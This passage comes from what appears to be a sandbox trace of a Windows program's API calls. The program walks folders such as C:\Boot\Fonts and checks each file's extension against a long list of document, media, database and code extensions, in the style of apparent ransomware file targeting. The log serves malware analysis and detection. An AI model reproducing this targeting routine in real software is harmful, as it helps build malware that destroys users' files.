(lpString1=".ini", lpString2=".mui") returned -1 [0285.562] lstrlenW (lpString=".iqy") returned 4 [0285.562] lstrcmpiW (lpString1=".iqy", lpString2=".mui") returned -1 [0285.562] lstrlenW (lpString=".j2c") returned 4 [0285.562] lstrcmpiW (lpString1=".j2c", lpString2=".mui") returned -1 [0285.562] lstrlenW (lpString=".j2k") returned 4 [0285.562] lstrcmpiW (lpString1=".j2k", lpString2=".mui") returned -1 [0285.562] lstrlenW (lpString=".java") returned 5 [0285.562] lstrcmpiW (lpString1=".java", lpString2="e.mui") returned -1 [0285.562] lstrlenW (lpString=".jp2") returned 4 [0285.563] lstrcmpiW (lpString1=".jp2", lpString2=".mui") returned -1 [0285.563] lstrlenW (lpString=".jpc") returned 4 [0285.563] lstrcmpiW (lpString1=".jpc", lpString2=".mui") returned -1 [0285.563] lstrlenW (lpString=".jpe") returned 4 [0285.563] lstrcmpiW (lpString1=".jpe", lpString2=".mui") returned -1 [0285.563] lstrlenW (lpString=".jpeg") returned 5 [0285.563] lstrcmpiW (lpString1=".jpeg", lpString2="e.mui") returned -1 [0285.563] lstrlenW (lpString=".jpf") returned 4 [0285.563] lstrcmpiW (lpString1=".jpf", lpString2=".mui") returned -1 [0285.563] lstrlenW (lpString=".jpg") returned 4 [0285.563] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0285.563] lstrlenW (lpString=".jpx") returned 4 [0285.563] lstrcmpiW (lpString1=".jpx", lpString2=".mui") returned -1 [0285.563] lstrlenW (lpString=".js") returned 3 [0285.563] lstrcmpiW (lpString1=".js", lpString2="mui") returned -1 [0285.563] lstrlenW (lpString=".jsf") returned 4 [0285.563] lstrcmpiW (lpString1=".jsf", lpString2=".mui") returned -1 [0285.563] lstrlenW (lpString=".json") returned 5 [0285.563] lstrcmpiW (lpString1=".json", lpString2="e.mui") returned -1 [0285.563] lstrlenW (lpString=".jsp") returned 4 [0285.563] lstrcmpiW (lpString1=".jsp", lpString2=".mui") returned -1 [0285.563] lstrlenW (lpString=".kdc") returned 4 [0285.563] lstrcmpiW (lpString1=".kdc", lpString2=".mui") returned -1 [0285.563] lstrlenW (lpString=".kmz") returned 4 [0285.563] lstrcmpiW (lpString1=".kmz", lpString2=".mui") returned -1 [0285.563] lstrlenW (lpString=".kwm") returned 4 [0285.563] lstrcmpiW (lpString1=".kwm", lpString2=".mui") returned -1 [0285.563] lstrlenW (lpString=".lasso") returned 6 [0285.564] lstrcmpiW (lpString1=".lasso", lpString2="xe.mui") returned -1 [0285.564] lstrlenW (lpString=".lbi") returned 4 [0285.564] lstrcmpiW (lpString1=".lbi", lpString2=".mui") returned -1 [0285.564] lstrlenW (lpString=".lgf") returned 4 [0285.564] lstrcmpiW (lpString1=".lgf", lpString2=".mui") returned -1 [0285.564] lstrlenW (lpString=".lgp") returned 4 [0285.564] lstrcmpiW (lpString1=".lgp", lpString2=".mui") returned -1 [0285.564] lstrlenW (lpString=".log") returned 4 [0285.564] lstrcmpiW (lpString1=".log", lpString2=".mui") returned -1 [0285.564] lstrlenW (lpString=".m1v") returned 4 [0285.564] lstrcmpiW (lpString1=".m1v", lpString2=".mui") returned -1 [0285.564] lstrlenW (lpString=".m4a") returned 4 [0285.564] lstrcmpiW (lpString1=".m4a", lpString2=".mui") returned -1 [0285.564] lstrlenW (lpString=".m4v") returned 4 [0285.564] lstrcmpiW (lpString1=".m4v", lpString2=".mui") returned -1 [0285.564] lstrlenW (lpString=".max") returned 4 [0285.564] lstrcmpiW (lpString1=".max", lpString2=".mui") returned -1 [0285.564] lstrlenW (lpString=".md") returned 3 [0285.564] lstrcmpiW (lpString1=".md", lpString2="mui") returned -1 [0285.564] lstrlenW (lpString=".mda") returned 4 [0285.564] lstrcmpiW (lpString1=".mda", lpString2=".mui") returned -1 [0285.564] lstrlenW (lpString=".mdb") returned 4 [0285.564] lstrcmpiW (lpString1=".mdb", lpString2=".mui") returned -1 [0285.564] lstrlenW (lpString=".mde") returned 4 [0285.564] lstrcmpiW (lpString1=".mde", lpString2=".mui") returned -1 [0285.564] lstrlenW (lpString=".mdf") returned 4 [0285.564] lstrcmpiW (lpString1=".mdf", lpString2=".mui") returned -1 [0285.564] lstrlenW (lpString=".mdw") returned 4 [0285.564] lstrcmpiW (lpString1=".mdw", lpString2=".mui") returned -1 [0285.565] lstrlenW (lpString=".mef") returned 4 [0285.565] lstrcmpiW (lpString1=".mef", lpString2=".mui") returned -1 [0285.565] lstrlenW (lpString=".mft") returned 4 [0285.565] lstrcmpiW (lpString1=".mft", lpString2=".mui") returned -1 [0285.565] lstrlenW (lpString=".mfw") returned 4 [0285.565] lstrcmpiW (lpString1=".mfw", lpString2=".mui") returned -1 [0285.565] lstrlenW (lpString=".mht") returned 4 [0285.565] lstrcmpiW (lpString1=".mht", lpString2=".mui") returned -1 [0285.565] lstrlenW (lpString=".mhtml") returned 6 [0285.565] lstrcmpiW (lpString1=".mhtml", lpString2="xe.mui") returned -1 [0285.565] lstrlenW (lpString=".mka") returned 4 [0285.565] lstrcmpiW (lpString1=".mka", lpString2=".mui") returned -1 [0285.565] lstrlenW (lpString=".mkidx") returned 6 [0285.565] lstrcmpiW (lpString1=".mkidx", lpString2="xe.mui") returned -1 [0285.565] lstrlenW (lpString=".mkv") returned 4 [0285.565] lstrcmpiW (lpString1=".mkv", lpString2=".mui") returned -1 [0285.565] lstrlenW (lpString=".mos") returned 4 [0285.565] lstrcmpiW (lpString1=".mos", lpString2=".mui") returned -1 [0285.565] lstrlenW (lpString=".mov") returned 4 [0285.565] lstrcmpiW (lpString1=".mov", lpString2=".mui") returned -1 [0285.565] lstrlenW (lpString=".mp3") returned 4 [0285.565] lstrcmpiW (lpString1=".mp3", lpString2=".mui") returned -1 [0285.565] lstrlenW (lpString=".mp4") returned 4 [0285.565] lstrcmpiW (lpString1=".mp4", lpString2=".mui") returned -1 [0285.565] lstrlenW (lpString=".mpeg") returned 5 [0285.565] lstrcmpiW (lpString1=".mpeg", lpString2="e.mui") returned -1 [0285.565] lstrlenW (lpString=".mpg") returned 4 [0285.565] lstrcmpiW (lpString1=".mpg", lpString2=".mui") returned -1 [0285.566] lstrlenW (lpString=".mpv") returned 4 [0285.566] lstrcmpiW (lpString1=".mpv", lpString2=".mui") returned -1 [0285.566] lstrlenW (lpString=".mrw") returned 4 [0285.566] lstrcmpiW (lpString1=".mrw", lpString2=".mui") returned -1 [0285.566] lstrlenW (lpString=".msg") returned 4 [0285.566] lstrcmpiW (lpString1=".msg", lpString2=".mui") returned -1 [0285.566] lstrlenW (lpString=".mxl") returned 4 [0285.566] lstrcmpiW (lpString1=".mxl", lpString2=".mui") returned 1 [0285.566] lstrlenW (lpString=".myd") returned 4 [0285.566] lstrcmpiW (lpString1=".myd", lpString2=".mui") returned 1 [0285.566] lstrlenW (lpString=".myi") returned 4 [0285.566] lstrcmpiW (lpString1=".myi", lpString2=".mui") returned 1 [0285.566] lstrlenW (lpString=".nef") returned 4 [0285.566] lstrcmpiW (lpString1=".nef", lpString2=".mui") returned 1 [0285.566] lstrlenW (lpString=".nrw") returned 4 [0285.566] lstrcmpiW (lpString1=".nrw", lpString2=".mui") returned 1 [0285.566] lstrlenW (lpString=".obj") returned 4 [0285.566] lstrcmpiW (lpString1=".obj", lpString2=".mui") returned 1 [0285.566] lstrlenW (lpString=".odb") returned 4 [0285.566] lstrcmpiW (lpString1=".odb", lpString2=".mui") returned 1 [0285.566] lstrlenW (lpString=".odc") returned 4 [0285.566] lstrcmpiW (lpString1=".odc", lpString2=".mui") returned 1 [0285.566] lstrlenW (lpString=".odm") returned 4 [0285.566] lstrcmpiW (lpString1=".odm", lpString2=".mui") returned 1 [0285.566] lstrlenW (lpString=".odp") returned 4 [0285.566] lstrcmpiW (lpString1=".odp", lpString2=".mui") returned 1 [0285.566] lstrlenW (lpString=".ods") returned 4 [0285.566] lstrcmpiW (lpString1=".ods", lpString2=".mui") returned 1 [0285.566] lstrlenW (lpString=".oft") returned 4 [0285.567] lstrcmpiW (lpString1=".oft", lpString2=".mui") returned 1 [0285.567] lstrlenW (lpString=".one") returned 4 [0285.567] lstrcmpiW (lpString1=".one", lpString2=".mui") returned 1 [0285.567] lstrlenW (lpString=".onepkg") returned 7 [0285.567] lstrcmpiW (lpString1=".onepkg", lpString2="exe.mui") returned -1 [0285.567] lstrlenW (lpString=".onetoc2") returned 8 [0285.567] lstrcmpiW (lpString1=".onetoc2", lpString2=".exe.mui") returned 1 [0285.567] lstrlenW (lpString=".opt") returned 4 [0285.567] lstrcmpiW (lpString1=".opt", lpString2=".mui") returned 1 [0285.567] lstrlenW (lpString=".oqy") returned 4 [0285.567] lstrcmpiW (lpString1=".oqy", lpString2=".mui") returned 1 [0285.567] lstrlenW (lpString=".orf") returned 4 [0285.567] lstrcmpiW (lpString1=".orf", lpString2=".mui") returned 1 [0285.567] lstrlenW (lpString=".p12") returned 4 [0285.567] lstrcmpiW (lpString1=".p12", lpString2=".mui") returned 1 [0285.567] lstrlenW (lpString=".p7b") returned 4 [0285.567] lstrcmpiW (lpString1=".p7b", lpString2=".mui") returned 1 [0285.567] lstrlenW (lpString=".p7c") returned 4 [0285.567] lstrcmpiW (lpString1=".p7c", lpString2=".mui") returned 1 [0285.567] lstrlenW (lpString=".pam") returned 4 [0285.567] lstrcmpiW (lpString1=".pam", lpString2=".mui") returned 1 [0285.567] lstrlenW (lpString=".pbm") returned 4 [0285.567] lstrcmpiW (lpString1=".pbm", lpString2=".mui") returned 1 [0285.567] lstrlenW (lpString=".pct") returned 4 [0285.567] lstrcmpiW (lpString1=".pct", lpString2=".mui") returned 1 [0285.567] lstrlenW (lpString=".pcx") returned 4 [0285.567] lstrcmpiW (lpString1=".pcx", lpString2=".mui") returned 1 [0285.567] lstrlenW (lpString=".pdd") returned 4 [0285.567] lstrcmpiW (lpString1=".pdd", lpString2=".mui") returned 1 [0285.567] lstrlenW (lpString=".pdf") returned 4 [0285.568] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0285.568] lstrlenW (lpString=".pdp") returned 4 [0285.568] lstrcmpiW (lpString1=".pdp", lpString2=".mui") returned 1 [0285.568] lstrlenW (lpString=".pef") returned 4 [0285.568] lstrcmpiW (lpString1=".pef", lpString2=".mui") returned 1 [0285.568] lstrlenW (lpString=".pem") returned 4 [0285.568] lstrcmpiW (lpString1=".pem", lpString2=".mui") returned 1 [0285.568] lstrlenW (lpString=".pff") returned 4 [0285.568] lstrcmpiW (lpString1=".pff", lpString2=".mui") returned 1 [0285.568] lstrlenW (lpString=".pfm") returned 4 [0285.568] lstrcmpiW (lpString1=".pfm", lpString2=".mui") returned 1 [0285.568] lstrlenW (lpString=".pfx") returned 4 [0285.568] lstrcmpiW (lpString1=".pfx", lpString2=".mui") returned 1 [0285.568] lstrlenW (lpString=".pgm") returned 4 [0285.568] lstrcmpiW (lpString1=".pgm", lpString2=".mui") returned 1 [0285.568] lstrlenW (lpString=".php") returned 4 [0285.568] lstrcmpiW (lpString1=".php", lpString2=".mui") returned 1 [0285.568] lstrlenW (lpString=".php3") returned 5 [0285.568] lstrcmpiW (lpString1=".php3", lpString2="e.mui") returned -1 [0285.568] lstrlenW (lpString=".php4") returned 5 [0285.568] lstrcmpiW (lpString1=".php4", lpString2="e.mui") returned -1 [0285.568] lstrlenW (lpString=".php5") returned 5 [0285.568] lstrcmpiW (lpString1=".php5", lpString2="e.mui") returned -1 [0285.568] lstrlenW (lpString=".phtml") returned 6 [0285.568] lstrcmpiW (lpString1=".phtml", lpString2="xe.mui") returned -1 [0285.568] lstrlenW (lpString=".pict") returned 5 [0285.568] lstrcmpiW (lpString1=".pict", lpString2="e.mui") returned -1 [0285.568] lstrlenW (lpString=".pl") returned 3 [0285.568] lstrcmpiW (lpString1=".pl", lpString2="mui") returned -1 [0285.568] lstrlenW (lpString=".pls") returned 4 [0285.568] lstrcmpiW (lpString1=".pls", lpString2=".mui") returned 1 [0285.568] lstrlenW (lpString=".pm") returned 3 [0285.568] lstrcmpiW (lpString1=".pm", lpString2="mui") returned -1 [0285.569] lstrlenW (lpString=".png") returned 4 [0285.569] lstrcmpiW (lpString1=".png", lpString2=".mui") returned 1 [0285.569] lstrlenW (lpString=".pnm") returned 4 [0285.569] lstrcmpiW (lpString1=".pnm", lpString2=".mui") returned 1 [0285.569] lstrlenW (lpString=".pot") returned 4 [0285.569] lstrcmpiW (lpString1=".pot", lpString2=".mui") returned 1 [0285.569] lstrlenW (lpString=".potm") returned 5 [0285.569] lstrcmpiW (lpString1=".potm", lpString2="e.mui") returned -1 [0285.569] lstrlenW (lpString=".potx") returned 5 [0285.569] lstrcmpiW (lpString1=".potx", lpString2="e.mui") returned -1 [0285.569] lstrlenW (lpString=".ppa") returned 4 [0285.569] lstrcmpiW (lpString1=".ppa", lpString2=".mui") returned 1 [0285.569] lstrlenW (lpString=".ppam") returned 5 [0285.569] lstrcmpiW (lpString1=".ppam", lpString2="e.mui") returned -1 [0285.569] lstrlenW (lpString=".ppm") returned 4 [0285.569] lstrcmpiW (lpString1=".ppm", lpString2=".mui") returned 1 [0285.569] lstrlenW (lpString=".pps") returned 4 [0285.569] lstrcmpiW (lpString1=".pps", lpString2=".mui") returned 1 [0285.569] lstrlenW (lpString=".ppsm") returned 5 [0285.569] lstrcmpiW (lpString1=".ppsm", lpString2="e.mui") returned -1 [0285.569] lstrlenW (lpString=".ppt") returned 4 [0285.569] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0285.569] lstrlenW (lpString=".pptm") returned 5 [0285.569] lstrcmpiW (lpString1=".pptm", lpString2="e.mui") returned -1 [0285.569] lstrlenW (lpString=".pptx") returned 5 [0285.569] lstrcmpiW (lpString1=".pptx", lpString2="e.mui") returned -1 [0285.569] lstrlenW (lpString=".prn") returned 4 [0285.569] lstrcmpiW (lpString1=".prn", lpString2=".mui") returned 1 [0285.569] lstrlenW (lpString=".ps") returned 3 [0285.569] lstrcmpiW (lpString1=".ps", lpString2="mui") returned -1 [0285.569] lstrlenW (lpString=".psb") returned 4 [0285.569] lstrcmpiW (lpString1=".psb", lpString2=".mui") returned 1 [0285.569] lstrlenW (lpString=".psd") returned 4 [0285.570] lstrcmpiW (lpString1=".psd", lpString2=".mui") returned 1 [0285.570] lstrlenW (lpString=".pst") returned 4 [0285.570] lstrcmpiW (lpString1=".pst", lpString2=".mui") returned 1 [0285.570] lstrlenW (lpString=".ptx") returned 4 [0285.570] lstrcmpiW (lpString1=".ptx", lpString2=".mui") returned 1 [0285.570] lstrlenW (lpString=".pub") returned 4 [0285.570] lstrcmpiW (lpString1=".pub", lpString2=".mui") returned 1 [0285.570] lstrlenW (lpString=".pwm") returned 4 [0285.570] lstrcmpiW (lpString1=".pwm", lpString2=".mui") returned 1 [0285.570] lstrlenW (lpString=".pxr") returned 4 [0285.570] lstrcmpiW (lpString1=".pxr", lpString2=".mui") returned 1 [0285.570] lstrlenW (lpString=".py") returned 3 [0285.570] lstrcmpiW (lpString1=".py", lpString2="mui") returned -1 [0285.570] lstrlenW (lpString=".qt") returned 3 [0285.570] lstrcmpiW (lpString1=".qt", lpString2="mui") returned -1 [0285.570] lstrlenW (lpString=".r3d") returned 4 [0285.570] lstrcmpiW (lpString1=".r3d", lpString2=".mui") returned 1 [0285.570] lstrlenW (lpString=".raf") returned 4 [0285.570] lstrcmpiW (lpString1=".raf", lpString2=".mui") returned 1 [0285.570] lstrlenW (lpString=".rar") returned 4 [0285.570] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0285.570] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef59a5b1, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0285.570] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef59a5b1, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0285.570] FindClose (in: hFindFile=0x3947d28 | out: hFindFile=0x3947d28) returned 1 [0285.571] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4014d58 | out: hHeap=0x470000) returned 1 [0285.571] FindNextFileW (in: hFindFile=0x3947e28, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc49ab3c7, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0109451, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef999ae4, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="Fonts", cAlternateFileName="")) returned 1 [0285.571] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4014d58 [0285.571] lstrlenW (lpString="C:\\Boot\\Fonts") returned 13 [0285.571] FindFirstFileW (in: lpFileName="C:\\Boot\\Fonts\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc49ab3c7, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0109451, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef999ae4, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3948328 [0285.572] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc49ab3c7, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0109451, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef999ae4, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0285.572] FindNextFileW (in: hFindFile=0x3948328, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc49ab3c7, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef782dd9, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2488a26, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x386467, dwReserved0=0x0, dwReserved1=0x0, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0285.572] lstrlenW (lpString="chs_boot.ttf") returned 12 [0285.572] lstrlenW (lpString=".1cd") returned 4 [0285.572] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0285.572] lstrlenW (lpString=".3ds") returned 4 [0285.572] lstrcmpiW (lpString1=".3ds", lpString2=".ttf") returned -1 [0285.572] lstrlenW (lpString=".3fr") returned 4 [0285.572] lstrcmpiW (lpString1=".3fr", lpString2=".ttf") returned -1 [0285.572] lstrlenW (lpString=".3g2") returned 4 [0285.572] lstrcmpiW (lpString1=".3g2", lpString2=".ttf") returned -1 [0285.572] lstrlenW (lpString=".3gp") returned 4 [0285.572] lstrcmpiW (lpString1=".3gp", lpString2=".ttf") returned -1 [0285.572] lstrlenW (lpString=".7z") returned 3 [0285.572] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0285.572] lstrlenW (lpString=".accda") returned 6 [0285.572] lstrcmpiW (lpString1=".accda", lpString2="ot.ttf") returned -1 [0285.572] lstrlenW (lpString=".accdb") returned 6 [0285.572] lstrcmpiW (lpString1=".accdb", lpString2="ot.ttf") returned -1 [0285.573] lstrlenW (lpString=".accdc") returned 6 [0285.573] lstrcmpiW (lpString1=".accdc", lpString2="ot.ttf") returned -1 [0285.573] lstrlenW (lpString=".accde") returned 6 [0285.573] lstrcmpiW (lpString1=".accde", lpString2="ot.ttf") returned -1 [0285.573] lstrlenW (lpString=".accdt") returned 6 [0285.573] lstrcmpiW (lpString1=".accdt", lpString2="ot.ttf") returned -1 [0285.573] lstrlenW (lpString=".accdw") returned 6 [0285.573] lstrcmpiW (lpString1=".accdw", lpString2="ot.ttf") returned -1 [0285.573] lstrlenW (lpString=".adb") returned 4 [0285.573] lstrcmpiW (lpString1=".adb", lpString2=".ttf") returned -1 [0285.573] lstrlenW (lpString=".adp") returned 4 [0285.573] lstrcmpiW (lpString1=".adp", lpString2=".ttf") returned -1 [0285.573] lstrlenW (lpString=".ai") returned 3 [0285.573] lstrcmpiW (lpString1=".ai", lpString2="ttf") returned -1 [0285.573] lstrlenW (lpString=".ai3") returned 4 [0285.573] lstrcmpiW (lpString1=".ai3", lpString2=".ttf") returned -1 [0285.573] lstrlenW (lpString=".ai4") returned 4 [0285.573] lstrcmpiW (lpString1=".ai4", lpString2=".ttf") returned -1 [0285.573] lstrlenW (lpString=".ai5") returned 4 [0285.573] lstrcmpiW (lpString1=".ai5", lpString2=".ttf") returned -1 [0285.573] lstrlenW (lpString=".ai6") returned 4 [0285.573] lstrcmpiW (lpString1=".ai6", lpString2=".ttf") returned -1 [0285.573] lstrlenW (lpString=".ai7") returned 4 [0285.573] lstrcmpiW (lpString1=".ai7", lpString2=".ttf") returned -1 [0285.573] lstrlenW (lpString=".ai8") returned 4 [0285.573] lstrcmpiW (lpString1=".ai8", lpString2=".ttf") returned -1 [0285.573] lstrlenW (lpString=".anim") returned 5 [0285.573] lstrcmpiW (lpString1=".anim", lpString2="t.ttf") returned -1 [0285.574] lstrlenW (lpString=".arw") returned 4 [0285.574] lstrcmpiW (lpString1=".arw", lpString2=".ttf") returned -1 [0285.574] lstrlenW (lpString=".as") returned 3 [0285.574] lstrcmpiW (lpString1=".as", lpString2="ttf") returned -1 [0285.574] lstrlenW (lpString=".asa") returned 4 [0285.574] lstrcmpiW (lpString1=".asa", lpString2=".ttf") returned -1 [0285.574] lstrlenW (lpString=".asc") returned 4 [0285.574] lstrcmpiW (lpString1=".asc", lpString2=".ttf") returned -1 [0285.574] lstrlenW (lpString=".ascx") returned 5 [0285.574] lstrcmpiW (lpString1=".ascx", lpString2="t.ttf") returned -1 [0285.574] lstrlenW (lpString=".asm") returned 4 [0285.574] lstrcmpiW (lpString1=".asm", lpString2=".ttf") returned -1 [0285.574] lstrlenW (lpString=".asmx") returned 5 [0285.574] lstrcmpiW (lpString1=".asmx", lpString2="t.ttf") returned -1 [0285.574] lstrlenW (lpString=".asp") returned 4 [0285.574] lstrcmpiW (lpString1=".asp", lpString2=".ttf") returned -1 [0285.574] lstrlenW (lpString=".aspx") returned 5 [0285.574] lstrcmpiW (lpString1=".aspx", lpString2="t.ttf") returned -1 [0285.574] lstrlenW (lpString=".asr") returned 4 [0285.574] lstrcmpiW (lpString1=".asr", lpString2=".ttf") returned -1 [0285.574] lstrlenW (lpString=".asx") returned 4 [0285.574] lstrcmpiW (lpString1=".asx", lpString2=".ttf") returned -1 [0285.574] lstrlenW (lpString=".avi") returned 4 [0285.574] lstrcmpiW (lpString1=".avi", lpString2=".ttf") returned -1 [0285.574] lstrlenW (lpString=".avs") returned 4 [0285.574] lstrcmpiW (lpString1=".avs", lpString2=".ttf") returned -1 [0285.574] lstrlenW (lpString=".backup") returned 7 [0285.574] lstrcmpiW (lpString1=".backup", lpString2="oot.ttf") returned -1 [0285.574] lstrlenW (lpString=".bak") returned 4 [0285.574] lstrcmpiW (lpString1=".bak", lpString2=".ttf") returned -1 [0285.575] lstrlenW (lpString=".bay") returned 4 [0285.575] lstrcmpiW (lpString1=".bay", lpString2=".ttf") returned -1 [0285.575] lstrlenW (lpString=".bd") returned 3 [0285.575] lstrcmpiW (lpString1=".bd", lpString2="ttf") returned -1 [0285.575] lstrlenW (lpString=".bin") returned 4 [0285.575] lstrcmpiW (lpString1=".bin", lpString2=".ttf") returned -1 [0285.575] lstrlenW (lpString=".bmp") returned 4 [0285.575] lstrcmpiW (lpString1=".bmp", lpString2=".ttf") returned -1 [0285.575] lstrlenW (lpString=".bz2") returned 4 [0285.575] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0285.575] lstrlenW (lpString=".c") returned 2 [0285.575] lstrcmpiW (lpString1=".c", lpString2="tf") returned -1 [0285.575] lstrlenW (lpString=".cdr") returned 4 [0285.575] lstrcmpiW (lpString1=".cdr", lpString2=".ttf") returned -1 [0285.575] lstrlenW (lpString=".cer") returned 4 [0285.575] lstrcmpiW (lpString1=".cer", lpString2=".ttf") returned -1 [0285.575] lstrlenW (lpString=".cf") returned 3 [0285.575] lstrcmpiW (lpString1=".cf", lpString2="ttf") returned -1 [0285.575] lstrlenW (lpString=".cfc") returned 4 [0285.575] lstrcmpiW (lpString1=".cfc", lpString2=".ttf") returned -1 [0285.575] lstrlenW (lpString=".cfm") returned 4 [0285.575] lstrcmpiW (lpString1=".cfm", lpString2=".ttf") returned -1 [0285.575] lstrlenW (lpString=".cfml") returned 5 [0285.575] lstrcmpiW (lpString1=".cfml", lpString2="t.ttf") returned -1 [0285.575] lstrlenW (lpString=".cfu") returned 4 [0285.575] lstrcmpiW (lpString1=".cfu", lpString2=".ttf") returned -1 [0285.575] lstrlenW (lpString=".chm") returned 4 [0285.575] lstrcmpiW (lpString1=".chm", lpString2=".ttf") returned -1 [0285.575] lstrlenW (lpString=".cin") returned 4 [0285.575] lstrcmpiW (lpString1=".cin", lpString2=".ttf") returned -1 [0285.576] lstrlenW (lpString=".class") returned 6 [0285.576] lstrcmpiW (lpString1=".class", lpString2="ot.ttf") returned -1 [0285.576] lstrlenW (lpString=".clx") returned 4 [0285.576] lstrcmpiW (lpString1=".clx", lpString2=".ttf") returned -1 [0285.576] lstrlenW (lpString=".config") returned 7 [0285.576] lstrcmpiW (lpString1=".config", lpString2="oot.ttf") returned -1 [0285.576] lstrlenW (lpString=".cpp") returned 4 [0285.576] lstrcmpiW (lpString1=".cpp", lpString2=".ttf") returned -1 [0285.576] lstrlenW (lpString=".cr2") returned 4 [0285.576] lstrcmpiW (lpString1=".cr2", lpString2=".ttf") returned -1 [0285.576] lstrlenW (lpString=".crt") returned 4 [0285.576] lstrcmpiW (lpString1=".crt", lpString2=".ttf") returned -1 [0285.576] lstrlenW (lpString=".crw") returned 4 [0285.576] lstrcmpiW (lpString1=".crw", lpString2=".ttf") returned -1 [0285.576] lstrlenW (lpString=".cs") returned 3 [0285.576] lstrcmpiW (lpString1=".cs", lpString2="ttf") returned -1 [0285.576] lstrlenW (lpString=".css") returned 4 [0285.576] lstrcmpiW (lpString1=".css", lpString2=".ttf") returned -1 [0285.576] lstrlenW (lpString=".csv") returned 4 [0285.576] lstrcmpiW (lpString1=".csv", lpString2=".ttf") returned -1 [0285.576] lstrlenW (lpString=".cub") returned 4 [0285.576] lstrcmpiW (lpString1=".cub", lpString2=".ttf") returned -1 [0285.576] lstrlenW (lpString=".dae") returned 4 [0285.576] lstrcmpiW (lpString1=".dae", lpString2=".ttf") returned -1 [0285.576] lstrlenW (lpString=".dat") returned 4 [0285.576] lstrcmpiW (lpString1=".dat", lpString2=".ttf") returned -1 [0285.576] lstrlenW (lpString=".db") returned 3 [0285.576] lstrcmpiW (lpString1=".db", lpString2="ttf") returned -1 [0285.576] lstrlenW (lpString=".dbf") returned 4 [0285.576] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0285.577] lstrlenW (lpString=".dbx") returned 4 [0285.577] lstrcmpiW (lpString1=".dbx", lpString2=".ttf") returned -1 [0285.577] lstrlenW (lpString=".dc3") returned 4 [0285.577] lstrcmpiW (lpString1=".dc3", lpString2=".ttf") returned -1 [0285.577] lstrlenW (lpString=".dcm") returned 4 [0285.577] lstrcmpiW (lpString1=".dcm", lpString2=".ttf") returned -1 [0285.577] lstrlenW (lpString=".dcr") returned 4 [0285.577] lstrcmpiW (lpString1=".dcr", lpString2=".ttf") returned -1 [0285.577] lstrlenW (lpString=".der") returned 4 [0285.577] lstrcmpiW (lpString1=".der", lpString2=".ttf") returned -1 [0285.577] lstrlenW (lpString=".dib") returned 4 [0285.577] lstrcmpiW (lpString1=".dib", lpString2=".ttf") returned -1 [0285.577] lstrlenW (lpString=".dic") returned 4 [0285.577] lstrcmpiW (lpString1=".dic", lpString2=".ttf") returned -1 [0285.577] lstrlenW (lpString=".dif") returned 4 [0285.577] lstrcmpiW (lpString1=".dif", lpString2=".ttf") returned -1 [0285.577] lstrlenW (lpString=".divx") returned 5 [0285.577] lstrcmpiW (lpString1=".divx", lpString2="t.ttf") returned -1 